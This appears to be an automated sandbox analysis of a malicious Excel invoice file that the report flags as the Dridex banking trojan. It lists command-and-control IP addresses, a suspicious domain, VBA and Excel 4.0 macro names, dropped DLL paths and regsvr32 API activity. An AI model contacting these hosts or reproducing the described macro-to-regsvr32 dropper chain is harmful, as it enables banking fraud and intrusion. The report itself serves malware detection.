Code function: 4_2_004939F9 InternetReadFile,

4_2_004939F9

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\28E159F7.emf

Jump to behavior

Source: global traffic

Source: regsvr32.exe, 00000004.00000002.2382308141.00000000003F1000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com$T equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2382308141.00000000003F1000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: inmindppe.com

Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000006.00000002.2230867623.00000000028E3000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: DWWIN.EXE, 00000006.00000003.2228827682.000000000292D000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crtF
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000006.00000002.2230867623.00000000028E3000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000006.00000002.2230867623.00000000028E3000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2229399297.00000000004F8000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: DWWIN.EXE, 00000006.00000003.2228898902.00000000004CE000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enRa
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230821082.0000000002898000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000006.00000002.2230867623.00000000028E3000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2382894388.0000000002180000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2234299675.00000000041C0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2382287592.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382544671.0000000001D80000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230070826.0000000002360000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2382894388.0000000002180000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2234299675.00000000041C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000002.2230885971.0000000002904000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000006.00000002.2233949552.0000000003727000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	String found in binary or memory: https://46.105.131.65/
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	String found in binary or memory: https://46.105.131.65/D
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2382308141.00000000003F1000.00000004.00000020.sdmp	String found in binary or memory: https://77.220.64.37/
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	String found in binary or memory: https://80.86.91.27/
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp	String found in binary or memory: https://80.86.91.27/h
Source: regsvr32.exe, 00000004.00000002.2382325199.000000000041E000.00000004.00000020.sdmp, DWWIN.EXE, 00000006.00000003.2228989819.0000000000538000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 49359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49339 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49339
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49217
Source: unknown	Network traffic detected: HTTP traffic on port 49327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49295
Source: unknown	Network traffic detected: HTTP traffic on port 49319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49379 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49291
Source: unknown	Network traffic detected: HTTP traffic on port 49371 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49209
Source: unknown	Network traffic detected: HTTP traffic on port 49347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49327
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49205
Source: unknown	Network traffic detected: HTTP traffic on port 49267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49399 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49323
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49287
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49283
Source: unknown	Network traffic detected: HTTP traffic on port 49391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49363 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49311
Source: unknown	Network traffic detected: HTTP traffic on port 49295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49399
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49395
Source: unknown	Network traffic detected: HTTP traffic on port 49247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49271
Source: unknown	Network traffic detected: HTTP traffic on port 49335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49391
Source: unknown	Network traffic detected: HTTP traffic on port 49205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49307
Source: unknown	Network traffic detected: HTTP traffic on port 49383 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49303
Source: unknown	Network traffic detected: HTTP traffic on port 49303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49387
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49383
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49355 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49403 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49375 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49379
Source: unknown	Network traffic detected: HTTP traffic on port 49323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49255
Source: unknown	Network traffic detected: HTTP traffic on port 49287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49375
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49371
Source: unknown	Network traffic detected: HTTP traffic on port 49255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49403
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49367
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49363
Source: unknown	Network traffic detected: HTTP traffic on port 49263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49395 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49367 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49239
Source: unknown	Network traffic detected: HTTP traffic on port 49243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49359
Source: unknown	Network traffic detected: HTTP traffic on port 49291 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49235
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49355
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49351
Source: unknown	Network traffic detected: HTTP traffic on port 49331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49193
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49387 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49299 -> 443

Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49197 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49235 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49239 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49259 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49267 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49275 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49287 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49323 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49331 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49335 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49339 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49347 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49359 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49367 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49371 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49375 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49379 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49387 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49391 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49395 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49399 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49403 version: TLS 1.2

E-Banking Fraud:

Detected Dridex e-Banking trojan

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00465150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,

4_2_00465150

Source: C:\Windows\System32\DWWIN.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Jump to dropped file

System Summary:

Document contains an embedded VBA macro which may execute processes

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")			Name: pagesREviewsd
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")			Name: pagesREviewsd

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: INV9698791470-20210111920647.xlsm	Initial sample: CALL
Source: INV9698791470-20210111920647.xlsm	Initial sample: CALL
Source: INV9698791470-20210111920647.xlsm	Initial sample: CALL
Source: INV9698791470-20210111920647.xlsm	Initial sample: CALL

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\deibsjhv.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004722A0 NtDelayExecution,	4_2_004722A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0048BE30 NtClose,	4_2_0048BE30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001FB770 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,	4_2_001FB770
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001FBA14 NtSetInformationProcess,	4_2_001FBA14

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00465150	4_2_00465150
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00481020	4_2_00481020
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047D030	4_2_0047D030
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004788C0	4_2_004788C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00478CC0	4_2_00478CC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0046ACD0	4_2_0046ACD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047A0D0	4_2_0047A0D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004798DA	4_2_004798DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047E0A0	4_2_0047E0A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0048DCA0	4_2_0048DCA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004850A0	4_2_004850A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00484CA0	4_2_00484CA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00485CB0	4_2_00485CB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00477564	4_2_00477564
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00461570	4_2_00461570
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047FDD0	4_2_0047FDD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004889F0	4_2_004889F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004871F0	4_2_004871F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047D980	4_2_0047D980
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0048D180	4_2_0048D180
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047C590	4_2_0047C590
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0046F9A0	4_2_0046F9A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00481240	4_2_00481240
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047A660	4_2_0047A660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00487660	4_2_00487660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00482E60	4_2_00482E60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00469E70	4_2_00469E70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00479E70	4_2_00479E70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0046CA10	4_2_0046CA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0048FA10	4_2_0048FA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00480220	4_2_00480220
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0048D620	4_2_0048D620
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00483EC0	4_2_00483EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0048FA10	4_2_0048FA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00466AD0	4_2_00466AD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004796D0	4_2_004796D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047F6E0	4_2_0047F6E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047B6F0	4_2_0047B6F0
